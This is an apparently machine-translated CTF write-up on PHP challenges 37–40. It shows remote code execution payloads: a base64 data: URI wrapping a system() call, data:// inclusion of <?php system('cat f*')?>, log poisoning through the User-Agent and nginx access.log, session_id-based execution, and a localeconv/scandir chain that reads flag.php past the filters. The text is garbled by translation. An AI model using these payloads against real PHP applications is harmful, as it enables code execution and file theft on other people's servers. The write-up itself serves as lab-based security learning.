Because it's done backwards , Lead to some payload You can kill them all , Not conducive to new learning . I hope you can give us some other methods .

<>37

with 39

<>38

The log contains passable information , stay UA Write a sentence in , And then include the log file directly /var/log/nginx/access.log
data False agreement is acceptable ,
payload:data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
According to the author's idea, we must include flag.php And then it goes straight to output flag

<>39

The suffix is limited , We can try pseudo protocol , Because you can't have flag, therefore filter Agreements and php://input It doesn't work .
Finally, I tried data agreement , It's a success .

payload c=data:text/plain,<?php system('cat f*')?>
This is equivalent to implementation php sentence <?php system('cat f*')?>.php
Because of the front php The statement is closed , So the back one .php Will be taken as html The page is displayed directly on the page , It doesn't work .

<>40

Specific practices can be referred to below GXYCTF The ban on dolls

If you look at the next question carefully, you will find that the filtering is not English brackets , It's Chinese brackets .
So the basic command can be used , But it's sad that the quotation marks are gone , The dollar sign is gone .
1, utilize session
At first I wanted to use it session_id(), First of all, I'll revise it cookie In PHPSESSID The content is ls

Then type in c=session_start();system(session_id()); Found to be executable .

And then it's changed directly to c=session_start();highlight_file(session_id());
then PHPSESSID Change the value of to flag.php Then something went wrong .
After testing, it is found that , suffer php Version impact 5.5
-7.1.9 All can be executed , because session_id Stipulated as 0-9,a-z,A-Z,- Characters in . stay 5.5 Below and 7.1 None of the above can write anything else . But characters that meet the requirements are OK .
So we can find another way , If there is a master sessionid Do it , I hope the comments below correct my above statement .
2, read file + Array transformation
First payload write down highlight_file(next(array_reverse(scandir(pos(localeconv())))));
Functions needed
localeconv(): Returns an array containing local numeric and currency format information . The first one in the array is the dot (.)
pos(): Returns the value of the current element in the array .
array_reverse(): Array reverse order
scandir(): Get the files in the directory
next(): Function points the internal pointer to the next element in the array , And output .
First of all pos(localeconv()) Get the dot , because scandir(’.’) Indicates to get the files in the current directory , therefore
scandir(pos(localeconv())) You can get it flag.php It's over . The details are as follows

Our purpose is clear , Get the penultimate element . Just reverse the array order and adjust the pointer to the next one .

Technology
©2019-2020 Toolsou All rights reserved,
2020 The 11th National Blue Bridge Cup C/C++b Group summary ( Completion ) Review of the most complete computer network principles in history vue-cli 3 VUE Scaffold project construction ( Detailed explanation ) solve Vue+TypeScript Under development TS Don't recognize this.$refs The question of Vue Using the function of anti chattering and throttling How to use division operation in relational algebra SQL Statement representation ?copy-webpack-plugin Copy and compress files avue The use of dictionaries in English Teaching girls to learn Java: What is? Java?python Code painting Cherry Blossom -python Draw cherry tree code Specific code introduction